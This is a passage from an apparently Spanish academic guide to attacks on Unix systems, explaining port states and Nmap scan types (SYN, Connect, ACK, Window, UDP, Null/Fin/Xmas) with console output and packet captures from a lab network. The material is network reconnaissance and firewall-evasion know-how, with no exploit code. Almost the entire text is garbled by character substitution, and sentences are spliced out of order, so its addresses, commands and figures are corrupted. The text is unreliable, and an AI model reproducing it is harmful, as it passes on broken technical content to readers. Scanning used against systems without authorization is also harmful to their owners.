En la Ca"tura 2 se "uede ver que luego de las "eticiones A<! ;*(1> ' el "aquete con el ,K@ enviado "or el "ort scanner al "uerto O. del $ost destino ;5># la respuesta que si)ue es un RATIA/J ;J>. Esto signi/ica que no $a' ningGn servicio es"erando "aquetes sobre el "uerto O. en el destino 51# "or lo tanto# el puerto ,$ est cerrado. Co o se "uede a"reciar en todos estos casos# el "uerto origen que el "ort scanner elige ;J*J.0 en este caso> es irrelevante# co o ta bin el resto de la in/or aci8n FC! que viaja% @ro de secuencia ;,EV># @ro de Ac6# el ta aBo de la ventana FC! ;4in># el ta aBo largo del "a'load ;:en>.
Paquete Nro: 1 Tiempo: 0.000000 Origen: 00:17:31:96:5b:1f: -> De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( Tiempo: 0.00+7(0 Origen: 00:0!:(9:e1:a(:(6: -> De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 Tiempo: 0.0+1151 Origen: 19(.16).0.(:635() -> De tino: 19(.16).0.30:53 Proto!o"o: DN. De !rip!i%n: -3a"forme7 Pa!6et0 Paquete Nro: + Tiempo: 0.0+153+ Origen: 19(.16).0.30: -> De tino: 19(.16).0.(: Proto!o"o: 8,3P De !rip!i%n: De tination unrea!'ab"e 9Port unrea!'ab"e:

9i o de seg ento ;M,,> ' el

Ca"tura -% !uerto 25! 5- Cerrado 51 Co o la ca"a FC! est a cargo del ,iste a ?"erativo# ste realiza la tarea de registrar qu "uerto est relacionado con qu "roceso# avisarle al is o cuando se abre una cone9i8n nueva# ' luego enviarle el "a'load de los "aquetes FC!. !or lo tanto# es ta bin el ,iste a ?"erativo que se encarga de la iniciaci8n ' /inalizaci8n de las cone9iones# no el "roceso. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. -+ de 22O

Ca")tulo 1. ( 1.2.Estados de un !uerto

En el caso de los "uertos 25! cerrados ;Ca"tura -># el

ensaje que se

recibe es un "aquete 7CM!# del ti"o - 55# que signi/ica C!uerto inalcanzableD. En este caso# el probe consiste en un env)o de un "aquete 25! al "uerto 5- destino ;usual ente utilizado "ara el servicio 5@,5J# $e aqu) el otivo>. El CMal/or ed !ac6etD que a"arece co o descri"ci8n del e9a en del scanner es "roducto de que el "aquete# si bien "arece "ertenecer al "rotocolo 5@,# no lo esH ni siquiera inclu'e un s8lo b'te corres"ondiente al "rotocolo 5@, co o carga del datagra a. =a' que recordar que los "ort scanners suelen no res"etar los "rotocolos ' "rocedi ientos estndar# tanto de ca"as in/eriores co o su"eriores# ' aqu) $a' una "rueba de ello.

1.2.-. !uerto Filtrado o Bloqueado ;CFilteredD>


2n "uerto se encuentra /iltrado cuando desde el objetivo no se recibe res"uestaH "uede causarse "orque un /ireIall# dis"ositivo inter edio ;router# sIitc$# etc.># o el equi"o destino is o est interru "iendo el nor al /lujo de los "aquetesH o ta bin que la red est saturada# o el "ort scanner es Ci "acienteD "ara una red en "articular ;lenta># ' deter ina que no recibi8 res"uesta# $abindose vencido un timer ;te "orizador>. Es $abilidad del "ort scanner anejar bien los tie "os# co o se ver a continuaci8n.

55 =a' que destacar que lo que se

uestra aqu) co o ca"tura de tr/ico es una inter"retaci8n de la

is a $ec$a con algunas $erra ientas de las cuales se dis"one# ocultando detalles "ara reducir la co "lejidad ' e9tensi8n innecesaria del docu ento. Es "or eso que aqu) no se a"recia el b'te .9.- dentro del encabezado 7CM! que indica esto. Ler el Ane9o B. 5J Ler Plosario% 5@,# "g. 2*.. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. -O de 22O

Ca")tulo 1. ( 1.2.Estados de un !uerto


Paquete Nro: 1 Tiempo: 0.000000 Origen: 00:17:31:96:5b:1f: -> De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( Tiempo: 0.000()3 Origen: 00:0!:(9:e1:a(:(6: -> De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 Tiempo: 0.0+059) Origen: 19(.16).0.(:37555 -> De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: 37555 > )0 -./N0 .eq10 2en10 3..11+60 Paquete Nro: + Tiempo: 0.15369) Origen: 19(.16).0.(:37556 -> De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: 37556 > )0 -./N0 .eq10 2en10 3..11+60

Ca"tura 1% Ca"tura de Fr/ico de un escaneo a un "uerto FC! bloqueado

En la Ca"tura 1 se ve que el 9ost destino nunca contesta los paquetes enviados por el scanner# que $ace 2 intentos in/ructuosos ;!aquetes - ' 1>. Aqu) se "uede co "render ejor "orqu es tan Gtil el buen anejo de los tie "os en is o en caso de que el otivo# "arte de la un so/tIare de escaneo de "uertos% la docu entaci8n del "rogra a utilizado en este caso5+ es"eci/ica que el A<! <equest lo $ace "or s) objetivo est en la eta"a inicial lla ada is a red local Et$ernet ;de otra /or a lo $ace el ,iste a ost discover1DE# es obtener el <FF50 del objetivo "ara

?"erativo# que es el que natural ente se encarga de esto>. El

esti ar los valores de los te "orizadores internos ' as) saber que si el $ost no contesta# tener la certeza de devolver resultados correctos. ,i to a os este caso co o eje "lo# el <FF es de .#...2O- seg# que equivalen a .#2 es"erar `*.. s.J.H entonces# de acuerdo a dic$o valor# el "ort scanner decidi8 s. "ara volver a enviar el test. :uego se dedic8 a es"erar "or un

5+ ,e $izo uso de @ a" co o so/tIare de escaneo de "uertos# ' la docu entaci8n a la que se $ace re/erencia en este caso est dis"onible en% $tt"%&&n a".org& an& an($ost(discover'.$t l 5O ost discover1 N descubri iento de $ost. :os "rogra as "ara escanear "uertos de equi"os de red "ri ero intentan establecer si el dis"ositivo objetivo est conectado a la red# encendido# recibe ' env)a "aquetes ;o no># ' la a'or cantidad de in/or aci8n de la red que los conecta% cantidad de equi"os inter edios# si alteran el tr/ico# la de ora entre ellos ' ta bin al $ost /inal# etc. :uego $acen las "ruebas corres"ondientes. Ler S=5U@MA!T. 50 Ler Plosario% <FF# "g. 2*2. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. -0 de 22O

Ca")tulo 1. ( 1.2.Estados de un !uerto

resultado del objetivo un tie "o a"ro9i ado de 1..

s. ,abiendo el <FF# est

claro que el nivel de con=ian3a en el resultado D>el puerto est siendo =iltrado?E es mu! alto. El tie "o total del test dur8 unos ..5 segundos ;5.. ilisegundos>. ,i bien este eje "lo es sencillo "orque se "osee un valor de <FF bastante con/iable resultado de una "etici8n A<!# en el caso de los escaneos a objetivos /uera de una :A@ el "roble a de Csaber cunto es"erarD se co "lica# 'a que $a' segura ente varios nodos inter edios# tr/ico de terceros# ' la "osibilidad de establecer un <FF Gnico ' constante es casi i "osible. 5i/erentes "ort scanners J* to an di/erentes criterios "ara tratar de solucionarlo# ' todo buen $ac6er debe conocer estos detalles# 'a que un /also "ositivo o un negativo err8neo "uede di/icultar la tarea de obtenci8n de CgrietasD en la seguridad de la red a "enetrar. !or Glti o# $a' que resaltar que de"endiendo de las $erra ientas que se utilicen# en un escaneo de puertos UD4 s-lo se puede aseverar que un puerto UD4 est cerradoK es decir% si no est cerrado% puede estar a(ierto o =iltrado . En el caso de que no se reciba un "aquete 7CM! C5estination 2nreac$ableD# "ara deter inar que un "uerto 25! est abierto# $a' que saber de ante ano qu servicio est escuc$ando en dic$o "uerto ' C$ablarD su "rotocolo. Es cierto que $a' un juego de "robabilidades ;"or eje "lo# en el "uerto 5- es real ente raro que $a'a algo di/erente a un servidor 5@,> en donde se de/ina un conjunto de "uertos 25! co unes "ara $acer "ruebas# "ero aGn as)# esta ca"acidad de i "le entar "rotocolos de ca"as su"eriores a la 1 esca"a usual ente a los "ort scanners dada su co "lejidad. Aqu) reside otra raz8n "or la cual los escaneos FC! son general ente s tenidos en cuenta.

1.-. Fi"os de !ort ,canning en @Ma"


As) co o $a' Glti"les estados de un "uerto# $a' Glti"les aneras de enviar probes. En este caso# el so/tIare de escaneo CtuerceD el "rotocolo FC! a su
J. Este tie "o ;`.#...2 segundos a `.#2 ilisegundos> es e9tre ada ente bajoH la raz8n reside quinas virtuales# no con una red /)sica de "or s.# "ero "uede variar uc$o. Ler Ane9o B. en que el bito de "ruebas se realiz8 con

edio. :os tie "os de retardo entre $osts en una red et$ernet t)"ica ;de algunas "ocas quinas> "uede establecerse en alrededor de * J* !ort Bunn' es un so/tIare de escaneo que se "reocu"a e9clusiva ente "or tener un buen esque a de timing# ' as) o"ti izar tie "os de tests de "uertos /iltrados# utilizando tcnicas bastante novedosas. Ler $tt"%&&III.recurit'(labs.co &"ortbunn'&"ortbunn'.$t l Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 1. de 22O

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

/avor ' utiliza di/erentes co binaciones no estndar de /lags FC! "ara averiguar la a'or cantidad de in/or aci8n de los "uertos destino en "articular ' de la red :a enu eraci8n que sigue $ace re/erencia a las tcnicas de escaneo dis"onibles en el "aquete de so/tIare Nmap. Aunque "robable ente sea el "ort scanner s utilizado# dis"oniendo de una variedad de ti"os de scanning que no se uestra algunas desventajas que encuentra /cil ente en otro scanner# ta bin "osterior ente. objetivo en general.

"ueden ser cubiertas "or otros "rogra as o tcnicas que se describirn

1.-.*. ,'n ,can


El ,'n ,can es el ti"o de scanning FC! obtener de s utilizado# 'a que "er ite anera r"ida ' bastante CsilenciosaD una idea del estado de los

"uertos FC! en el destino. Consiste en enviar un "aquete de inicio de cone9i8n FC! ;con el /lag ,K@ activado># a es"era de una res"uesta del destino. ,i la res"uesta es un "aquete ,K@_ACR# el "uerto est abierto. ,i la res"uesta es un <,F o <,F_ACR# el "uerto est cerrado. ,i no $a' res"uesta o se recibe un 7CM! 2nreac$able# @ a" identi/ica el "uerto co o /iltrado ;si es el "ri er caso# se dice que los "aquetes que env)a el "ort scanner son Cdro"eadosDBA>.
marcelo@saturno:~/src/nmap/bin$ u7o .;nmap - . -p (( 19(.16).0.30

.tarting Nmap +.50 9 'ttp:;;in e!ure.org : at (00)-0(-(3 1+:50 #$.T 8ntere ting port on !i!"on 919(.16).0.30:: PO$T .T#T< .<$=8,< ((;t!p open ' 3#, #77re : 00:0,:(9:<1:#(:(6 9=3>are: Nmap 7one: 1 8P a77re 91 'o t up: marcelo@saturno:~/src/nmap/bin$ !anne7 in 0.3)1 e!on7

Consola *% ,alida t)"ica de un ,'n ,can "or @ a"

En la Consola @ro.* se "uede ver un escaneo $ec$o "or @ a" ' el resultado corres"ondiente% el "uerto 22 est abierto. @ a" en este caso CadivinaD que el servicio que est detrs es un ,ecure ,$ell J-# "ero no $ace una indagaci8n real al res"ectoH s8lo indica que el "uerto 22# de acuerdo a una tabla de servicios&nG ero de "uerto# es nor al ente utilizado "or ,,= ; s adelante se ver c8 o @ a"
J2 En la jerga# Cdro"earD un "aquete es CtirarloD# o CignorarloD. Es una castellanizaci8n del verbo drop# que en ingls signi/ica CtirarD. J- Ler Plosario% ,,=# "g. 2*2. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 1* de 22O

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

"er ite $acer detecci8n de servicios>. El co ando C u7o .;nmap - . -p (( 19(.16).0.30 C ta bin /ue el que gener8 la Ca"tura *H sin e bargo las ca"turas 2 ' 1 ta bin son de ti"o ,'n# aunque los resultados /ueron di/erentes% la colu na S-4-3 ;CEstadoD> /ue re"ortada co o closed ;CCerradoD> ' filtered ;CFiltradoD> res"ectiva ente# ade s de ir dirigidos a "uertos di/erentes. En el siguiente a"artado se detallarn las o"ciones de @ a"# junto con las caracter)sticas avanzadas. Es i "ortante destacar que este ti"o de escaneo requiere de "er isos de root o ad inistrador del ,iste a ?"erativo# 'a que accede a la A!7 J1 de ,oc6ets <aIJ5# ' el acceso a sta es una de las ca"acidades e9clusivas de rootJJ.

1.-.2. Connect ,can


El CConnect ,canD es el ti"o de escaneo es el s antiguo# ' "odr)a decirse que enos original. ,i "le ente trata de establecer una cone9i8n FC! de tres

v)as en /or a co "leta ;,'n ,'n_Ac6 b Ac6>H si el "uerto se encuentra abierto# luego de establecerse la cone9i8n# el scanner la cierra. ,i el "uerto estaba cerrado o /iltrado# los resultados son iguales al ,'n ,can. :a "rinci"al ventaja que tiene es que no son necesarios los "er isos de root# s8lo $a' que ser usuario del siste a# 'a que en este caso se res"eta el "rotocolo FC!J+ ' se $ace uso de la is a A!7JO ;B,5 ,oc6ets> que el resto de los s "rogra as de red ;navegadores Ieb# clientes de correo# etc.>. :a desventaja es que estos intentos de escaneo son sensible ente servicio que est escuc$ando en el "uerto destino# el visibles en la red que el ,'n ,can# 'a que al establecerse la cone9i8n con el is o recibe el evento de s /cil ente cone9i8n# "udiendo asentarlo en su arc$ivo de logs ' ser auditado
J1 Ler Plosario% A!7# "g. 2*.. J5 Ler Plosario% ,oc6ets <aI# "g. 2*2. JJ !ara ver un listado ' s detalle de las Ca"acidades ;&apabilites> de root en :inu9% $tt"%&&III.esdebian.org&static"ages&inde9."$"Y"agea2..1.+*5.2--1+O2+ $tt"%&&III.ib .co &develo"erIor6s&librar'&l("osi9ca".$t l $tt"%&&III.securit'/ocus.co &in/ocus&*1.. J+ El inicio de sesi8n FC! se es"eci/ica en el <FC+0-# secci8n -.1. 2<:%$tt"%&&tools.iet/.org&$t l&r/c+0-csection(-.1 JO :a A!7 que utilizan la a'or)a de los "rogra as "ara acceder a las /unciones FC!&25! del ,iste a ?"erativo se lla a B,5 ,oc6ets. Ler $tt"%&&en.Ii6i"edia.org&Ii6i&B,5Usoc6ets Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 12 de 22O

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

"or un ad inistrador o "ersonal de seguridad. ?tra contra es que es nota banda># 'a que "or cada "uerto a "robar# se env)an al

s lento ;se s que

s si la red est saturada# su/re de retardo o el enlace tiene "oco anc$o de enos 2 "aquetes

con el ,'n ,can ;Ac6 del ?rigen en vez del <st _ el Banner del ,ervicio del destino _ el <,F del ?rigen># sin tener en cuenta justa ente# retrans isiones o de oras.
marcelo@saturno:~/src/nmap/bin$ .;nmap -P0 -p (( 19(.16).0.30 .tarting Nmap +.50 9 'ttp:;;in e!ure.org : at (00)-0(-(3 17:(3 #$.T 8ntere ting port on !i!"on 919(.16).0.30:: PO$T .T#T< .<$=8,< ((;t!p open ' Nmap 7one: 1 8P a77re 91 'o t up: marcelo@saturno:~/src/nmap/bin$ !anne7 in 0.119 e!on7

Consola 2% Eje "lo de Connect ,can con @Ma"

En la Consola 2 queda evidenciado que salvo "or la no utilizaci8n del co ando de 2ni9 CsudoDJ0 ' "or la /alta de "ar etros es"eci/icando el ti"o de escaneo+.# "edirle a @ a" que $aga un Connect ,can es A continuaci8n se escaneo de "uertos.
Paquete Nro: 1 Tiempo: 0.000000 Origen: 00:17:31:96:5b:1f: -> De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( Tiempo: 0.0007)0 Origen: 00:0!:(9:e1:a(:(6: -> De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 Tiempo: 0.000795 Origen: 19(.16).0.(:57)59 -> De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 57)59 > (( -./N0 .eq10 2en10 3..11+60 T.=1)376003 T.<$10 &.17 Paquete Nro: + Tiempo: 0.0009)5

u' sencillo. ientras se ejecutaba el

uestra una ca"tura de tr/ico

J0 ,udo es un "rogra a que "er ite dar acceso a un usuario o un gru"o 2ni9 "er isos "ara ejecutar un co ando co o usuario root. 2<:% $tt"%&&III.sudo.Is& +. El Connect ,can es el que @ a" ejecuta "or de/ecto "ara los usuarios no root. AGn co o usuario root# el "ar etro (sF "er ite /orzar este ti"o de scanning. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 1- de 22O

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"


Origen: 19(.16).0.30:(( -> De tino: 19(.16).0.(:57)59 Proto!o"o: T,P De !rip!i%n: (( > 57)59 -./N4 #,50 .eq10 #!611 &in1131070 2en10 3..11+60 &.11 T.=1(13))76) T.<$1)376003 Paquete Nro: 5 Tiempo: 0.00101+ Origen: 19(.16).0.(:57)59 -> De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 57)59 > (( -#,50 .eq11 #!611 &in15))) 2en10 T.=1)37600+ T.<$1(13))76) Paquete Nro: 6 Tiempo: 0.039)61 Origen: 19(.16).0.30:(( -> De tino: 19(.16).0.(:57)59 Proto!o"o: ..? De !rip!i%n: .er@er Proto!o": ..?-(.0-Open..?A+.5p1 BreeC.D-(0061110 Paquete Nro: 7 Tiempo: 0.039)99 Origen: 19(.16).0.(:57)59 -> De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 57)59 > (( -#,50 .eq11 #!61+0 &in15))) 2en10 T.=1)37601+ T.<$1(13)))75 Paquete Nro: ) Tiempo: 0.057+67 Origen: 19(.16).0.(:57)59 -> De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 57)59 > (( -$.T4 #,50 .eq11 #!61+0 &in15))) 2en10 T.=1)376019 T.<$1(13)))75

Ca"tura 5% Ca"tura de Fr/ico de un Connect ,can

En los "aquetes - a 5 de la ca"tura se ve c8 o se establece el - ree'%a1 Hands ake FC! entre origen ' destino ;no olvidar que el "uerto 22 en *02.*JO...-. est abierto>. :uego ;J># interviene en Cla c$arlaD el de onio ,,= del $ost destino# enviando su banner+) tal co o lo es"eci/ica su "rotocolo +2. !or Glti o# @ a" env)a un ACR ;+> del "aquete J# ' luego cierra la cone9i8n con un <st_Ac6 en el "aquete @ro.O ;no es la /or a estndar de $acerlo# sino que es una /or a de =or3ar el cierre de la sesi8n FC!>.

1.-.-. Ac6 ,can


El ACR ,can $ace que el objetivo env)e co o res"uesta un "aquete con el /lag <,F "or cada "uerto# inde"endiente ente de que est abierto o cerrado. ,i no
+* 5anner ;CFitularD>. Es una "rctica co Gn de la de CanuncioD al cliente que se conecta. Este a'or)a de los "rotocolos enviar un ensaje a'or

ensaje se lla a 5anner en la jerga.

+2 El "rotocolo ,,= versi8n 2 es un estndar abierto ' est detallado en varios <FCs. :a 2<:s% $tt"%&&tools.iet/.org&$t l&r/c125*# $tt"%&&III.o"enss$.co & anual.$t l

"arte de su arquitectura ' co "onentes se es"eci/ican en los <FC 125. al 125J.

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 11 de 22O

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

$a' res"uesta o se recibe un 7CM! Cdestination unreac$ableD# se debe

u'

"robable ente a que un /ireIall o dis"ositivo de /iltrado de "aquetes est i "idiendo que los probes de este escaneo lleguen a destino. Justa ente ste es el objetivo de esta "rueba. Este ti"o de scanning permite dar una idea al atacante so(re qu puertos estn siendo =iltrados ' a qu "uertos del objetivo es "er itido acceder% su salida es C/ilteredD o Cun/ilteredD.
marcelo@saturno:~/src/nmap/bin$ u7o .;nmap - # -p ((4)0 19(.16).0.30

.tarting Nmap +.50 9 'ttp:;;in e!ure.org : at (00)-03-0( 16:+5 #$.T 8ntere ting port on !i!"on 919(.16).0.30:: PO$T .T#T< .<$=8,< ((;t!p unfi"tere7 ' )0;t!p unfi"tere7 'ttp 3#, #77re : 00:0,:(9:<1:#(:(6 9=3>are: Nmap 7one: 1 8P a77re 91 'o t up: marcelo@saturno:~/src/nmap/bin$ !anne7 in 0.3+6 e!on7

Consola -% Eje "lo * de Escaneo ACR ( !uertos @o Filtrados

Paquete Nro: 1 Tiempo: 0.000000 Origen: 00:17:31:96:5b:1f: -> De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( Tiempo: 0.000(69 Origen: 00:0!:(9:e1:a(:(6: -> De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 Tiempo: 0.031)9) Origen: 19(.16).0.(:3++90 -> De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 3++90 > (( -#,50 .eq10 #!610 &in110(+ 2en10 Paquete Nro: + Tiempo: 0.03(16( Origen: 19(.16).0.30:(( -> De tino: 19(.16).0.(:3++90 Proto!o"o: T,P De !rip!i%n: (( > 3++90 -$.T0 .eq10 2en10 Paquete Nro: 5 Tiempo: 0.03(3(1 Origen: 19(.16).0.(:3++90 -> De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: 3++90 > )0 -#,50 .eq10 #!610 &in1(0+) 2en10

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 15 de 22O

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

Paquete Nro: 6 Tiempo: 0.03(396 Origen: 19(.16).0.30:)0 -> De tino: 19(.16).0.(:3++90 Proto!o"o: T,P De !rip!i%n: )0 > 3++90 -$.T0 .eq10 2en10

Ca"tura J% Eje "lo de Ac6 ,can con !uertos @o Filtrados

En a bos cuadros

ostrados "revia ente ;la Consola @ro. - gener8 la

Ca"tura @ro. J># se "uede ver que aGn cuando el "uerto 22 est abierto ' el O. est cerrado# el objetivo del test es otro% el resultado del "aquete con /lag ACR es un <,F# ' @ a" en la salida dice que a bos "uertos estn sin /iltrar. El caso o"uesto ocurre en el eje "lo siguiente%
marcelo@saturno:~/src/nmap/bin$ - u7o0 pa >or7 for mar!e"o: u7o .;nmap - # -p )0)0 19(.16).0.30

.tarting Nmap +.50 9 'ttp:;;in e!ure.org : at (00)-03-0( 17:10 #$.T 8ntere ting port on !i!"on 919(.16).0.30:: PO$T .T#T< .<$=8,< )0)0;t!p fi"tere7 'ttp-proDE 3#, #77re : 00:0,:(9:<1:#(:(6 9=3>are: Nmap 7one: 1 8P a77re 91 'o t up: marcelo@saturno:~/src/nmap/bin$ !anne7 in 0.6)1 e!on7

Consola 1% @Ma"

ostrando un "uerto /iltrado co o resultado de un ACR ,can

Paquete Nro: 1 Tiempo: 0.000000 Origen: 00:17:31:96:5b:1f: -> De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( Tiempo: 0.000697 Origen: 00:0!:(9:e1:a(:(6: -> De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 Tiempo: 0.036039 Origen: 19(.16).0.(:35)37 -> De tino: 19(.16).0.30:)0)0 Proto!o"o: T,P De !rip!i%n: 35)37 > )0)0 -#,50 .eq10 #!610 &in1+096 2en10 Paquete Nro: + Tiempo: 0.1+(6(7 Origen: 19(.16).0.(:35)3) -> De tino: 19(.16).0.30:)0)0 Proto!o"o: T,P De !rip!i%n: 35)3) > )0)0 -#,50 .eq10 #!610 &in110(+ 2en10

Ca"tura +% Ca"tura que

uestra la no res"uesta del objetivo al ACR ,can

En este caso# se "uede observar que el objetivo no res"onde al ACR ,can# "or lo tanto l o algGn dis"ositivo inter edio est /iltrando los "aquetes enviados.
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 1J de 22O

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

1.-.1. 4indoI ,can


El 4indoI ,can es si ilar al anterior# con la di/erencia de que el "ort scanner# luego de enviar el "aquete con el ACR# intenta $acer una su"osici8n del estado del "uerto de acuerdo a di/erencias conocidas en el ta aBo de ventana FC! del "aquete <,F que obtiene co o res"uesta ;si se recibe un <,F ' el ta aBo de ventana es .# es "robable que el "uerto est cerrado# si el ta aBo de ventana es un nG ero "ositivo# es "robable que est abierto>. Este ti"o de escaneo de"ende e9clusiva ente de la i "le entaci8n del stac6 FC! del ,iste a ?"erativo destino# "or lo que no es mu! con=ia(leH aGn as)# general ente es cuesti8n de correrlo ' ver si los resultados revelan alguna in/or aci8n interesante. !or eje "lo# si "ara los "uertos co unes ;22# 25# O.> se obtiene un Cun/ilteredD# es "robable que e/ectiva ente# dic$os "uertos estn abiertosH en algunos casos sucede a la inversa# etc.+-

1.-.5. 25! ,can


El escaneo 25! se encarga de veri/icar el estado de los "uertos 25! del destino. :a di/icultad Ce9traD ;teniendo en cuenta la obtenci8n de resultados Gtiles> que "lantea el "rotocolo 25! es su /alta de estado# 'a que est orientado a datagra as+1# sin la co "lejidad del esque a basado en cone9iones de FC!. ?tra desventaja es que al no tener di/erentes estos Cestados de cone9i8nD ;'a que co o se dijo# no $a' cone9iones># el test que $ace el "ort scanner es directa ente enviado a la a"licaci8n "or el ,iste a ?"erativo ;si el "uerto est abierto># lo que $ace al test evidente ente de ti"o FC!. 5ebido a lo anterior# @ a" "roduce usual ente dos resultados% "uerto cerrado o Co"end/ilteredD ;abierto o /iltrado>. El "ri ero corres"onde a que se recibi8 un "aquete 7CM! de ti"o C5estination 2nreac$able&!ort 2nreac$ableD ;7CM! ti"o -# c8digo ->H el segundo a que no se recibi8 res"uesta# cosa que
+- AGn as)# a "esar de $aberse realizado varias "ruebas con di/erentes ,?s actuales ' no tanto# no se $a "odido obtener di/erencia substancial alguna con res"ecto al ACR ,can% todos los ta aBos de ventana de los <,F ;de "uertos abiertos ' cerrados> son .. Es "or eso que este escaneo no es tan /recuente# ' "uede que tenga co o 25! o is o 7!. a'or valor en arquitecturas o redes Clegac1D. +1 En general# se considera co o datagra a un "aquete corres"ondiente a un servicio no /iable#

s detectable "ara el objetivo que algunos escaneos

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 1+ de 22O

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

sucede con la

a'or)a de los servicios que utilizan 25!# 'a que @ a" env)a un

probe 25! "ero vac6o+5#+J. Ade s estos resultados# en ocasiones "uede recibirse un 7CM! ti"o ;5estination 2nreac$able># "ero c8digo *# 2# 0# *. o *-# en cu'os casos# @ a" in/or a que el "uerto est /iltrado ;sola ente>. Esto es as) "orque justa ente estos "aquetes 7CM! re"ortan un "roble a con el destino o una "ro$ibici8n a nivel ad inistrativo. !or Glti o# si algGn servicio que est escuc$ando en el "uerto 25! que est siendo escaneado# retorna alguna res"uesta al Cest) uloD del datagra a vac6o enviado "or @ a"# ste lo arca co o a(ierto. Estos dos Glti os casos no son tan co unes# 'a que en las redes de $o' en d)a estos "aquetes 7CM! no son utilizados "or routers&/ireIalls ;los datagra as si "le ente se Cdro"eanD># o "or otra "arte no $a' res"ondan a un ensaje vac)o# res"ectiva ente. uc$os servicios que

1.-.J. Mai on# @ull# Fin ' A as ,can


Estos ti"os de scanning tienen un objetivo co Gn% de=inir qu puertos se encuentran cerrados# enviando di/erentes co binaciones de /lags# segGn el ti"o de scan%

Null% @ingGn Flag activado. 2in% F7@ sola ente. Cmas++% F7@ _ !,= _ 2<P. 1aimon% F7@ _ ACR. :a idea de esta co binaci8n de banderas FC! es obtener "rovec$o de un

"ar de detalles de la es"eci/icaci8n de las <FC +0- S<FCU+0-T# que establece que%

Cuando el estado de un "uerto es Cerrado# cualquier seg ento de entrada es res"ondido con un <,F co o res"uesta. ,i el estado es :isten ;Abierto># cualquier otro seg ento que no contenga un ,K@# <,F o un ACR# el $ost debe Cdro"earD el "aquete ;aGn cuando

+5 Ler Ca"tura -# "g. -+. +J @ a" ta bin dis"one de $erra ientas "ara $acer /inger"rint de servicios ' ,?s. Ler "g. 0-. ++ ,e lo lla a A as "or abreviaci8n del ingls c ristmas ;CnavidadD># "orque la re"resentaci8n del b'te de los /lags activados en el $eader FC! es si ilar a las luces de un rbol de navidad ;cIr# ecn# 2<P# ac6# !,=# rst# s'n# F7@ a ..*.*..* a .920> Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 1O de 22O

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

no deber)a suceder este caso en un /lujo nor al>. Es "or esto que# si el "ort scanner env)a a un $ost%"uerto un "aquete con cualquier co binaci8n de /lags que no inclu'a ,K@# <,F o ACR# deber)a obtener un <,F si el "uerto est cerrado# ' ninguna res"uesta si el "uerto est abierto ;o /iltrado# claro est>. 2na contingencia a tener en cuenta es que en ste "unto en "articular no todos los ,iste as ?"erativos siguen esta reglaH los no basados en 2ni9 ;4indoIs# Cisco# 7BM ?,&1..# etc.> suelen enviar un <,F sie "re# est el "uerto abierto o cerrado. Es "or eso que "or un lado $a' que Cto ar con "inzasD los resultados de este escaneo ' no co o de/initivosH "or otra "arte# sigue siendo in/or aci8n Gtil saber que "or eje "lo# si se $a recibido un <,F a "esar de que ciertos "uertos estn abiertos# el ,? destino no es un 2ni9 o derivado ' s) "robable ente est corriendo un ,? 4indoIs o Cisco. Ade s# lo interesante de estas tcnicas de escaneo es que "er iten "asar "or edio de los /ireIalls sin estado o stateless+O ;aquellos que no tienen noci8n de las cone9iones "revia ente establecidas># 